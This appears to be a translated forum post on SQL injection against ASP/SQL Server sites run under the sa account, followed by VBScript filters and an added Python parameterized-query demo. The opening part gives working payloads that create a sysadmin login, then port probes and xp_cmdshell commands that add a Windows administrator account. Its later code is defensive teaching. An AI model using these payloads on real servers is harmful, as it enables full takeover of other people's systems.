Many people publish a database and keep using the sa account, and then write queries like "select .. where name = '" & Request.QueryString("name") & "'". Let's take a look at what that leads to.
[Problem: work out the specifics yourself]
Set the value of Request.QueryString("name") to:
1. '; exec master.dbo.sp_addlogin test, test, master -- // create a login
2. '; exec master.dbo.sp_addsrvrolemember 'test', 'sysadmin' -- // add the login test to the sysadmin role
Use telnet www.***.com 1433 to see whether you can log in remotely; if you can, hehe...
No? You can't?
The people who wrote the program above are not very skilled; check which ports his machine has open: telnet www.***.com 1433, telnet www.***.com 3389, telnet www.***.com 21, telnet www.***.com 139, telnet www.***.com 445. Most of them will be; let's suppose they are all open! Run the following stored procedures in his SQL Query Analyzer, one at a time: exec master.dbo.xp_cmdshell 'net user test test /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add' and exec master.dbo.xp_cmdshell 'net localgroup administrators test /add'
This way you have created a system account on his machine, in addition to the SQL account.
What I would want to do next I will not say; instead I will say how to prevent the attack.
Method 1 - filter single quotes (VBScript; every single quote is doubled so the value cannot close the string literal it is placed in):
    Function Escape(input)
        ' double each single quote so it stays inside the quoted SQL string
        input = Replace(input, "'", "''")
        Escape = input
    End Function
Method 2 - reject known bad input (VBScript; a blacklist of SQL keywords, the comment marker and the single quote, compared case-insensitively):
    Function validate_string(input)
        known_bad = Array("select", "insert", "update", "delete", "drop", "--", "'")
        validate_string = True
        For i = LBound(known_bad) To UBound(known_bad)
            ' vbTextCompare makes the search case-insensitive
            If (InStr(1, input, known_bad(i), vbTextCompare) <> 0) Then
                validate_string = False
                Exit Function
            End If
        Next
    End Function
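The two defences above ported to Python and placed next to a parameterized query, as an added example that is not part of the original post. The product table, its rows and the function names are constructed for this illustration; SQLite from the standard library stands in for SQL Server. It shows that doubling single quotes (Method 1) keeps the input inside the string literal, that the blacklist (Method 2) also rejects legitimate names containing an apostrophe, and that a parameterized query handles both cases without any filtering because the driver never treats the value as SQL text.

```python
"""Added example: the post's two filters beside a parameterized query.
Sample table and rows are constructed; sqlite3 stands in for SQL Server."""
import sqlite3

# Method 1 from the post: double every single quote so the value stays
# inside the string literal when it is concatenated into the SQL text.
def escape(value: str) -> str:
    return value.replace("'", "''")

# Method 2 from the post: reject input containing known-bad fragments.
# Note the false positive on ordinary names that contain an apostrophe.
KNOWN_BAD = ("select", "insert", "update", "delete", "drop", "--", "'")

def validate_string(value: str) -> bool:
    lowered = value.lower()          # the VBScript used vbTextCompare
    return not any(bad in lowered for bad in KNOWN_BAD)

def make_db() -> sqlite3.Connection:
    """Build an in-memory table of constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, price INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [("widget", 10), ("gadget", 25), ("o'ring", 3)])
    conn.commit()
    return conn

def lookup_concat(conn: sqlite3.Connection, name: str) -> list:
    """The pattern the post warns about, SQL built by string concatenation,
    with escape() applied so the value cannot close the string literal."""
    sql = "SELECT name, price FROM products WHERE name = '" + escape(name) + "'"
    return conn.execute(sql).fetchall()

def lookup_param(conn: sqlite3.Connection, name: str) -> list:
    """Parameterized form: the driver sends name as data, never as SQL."""
    sql = "SELECT name, price FROM products WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()

def table_intact(conn: sqlite3.Connection) -> bool:
    """True if the products table still exists with all three sample rows."""
    row = conn.execute("SELECT COUNT(*) FROM products").fetchone()
    return row[0] == 3

if __name__ == "__main__":
    db = make_db()
    hostile = "'; DROP TABLE products --"   # constructed: uses the post's own blacklist terms
    print(lookup_param(db, "o'ring"))        # legitimate name with an apostrophe: one row
    print(lookup_concat(db, "o'ring"))       # same row, escape() kept the quote inside the literal
    print(validate_string("o'ring"))         # False: the blacklist rejects a legal name
    print(lookup_param(db, hostile))         # []: treated as a name that matches nothing
    print(lookup_concat(db, hostile))        # []: the doubled quote keeps it a literal
    print(table_intact(db))                  # True
```

The concatenated form only stays safe here because every value passes through escape() first and the column is a string; a numeric column compared without quotes would not be protected by Method 1 at all, which is why the parameterized form is the one to standardize on.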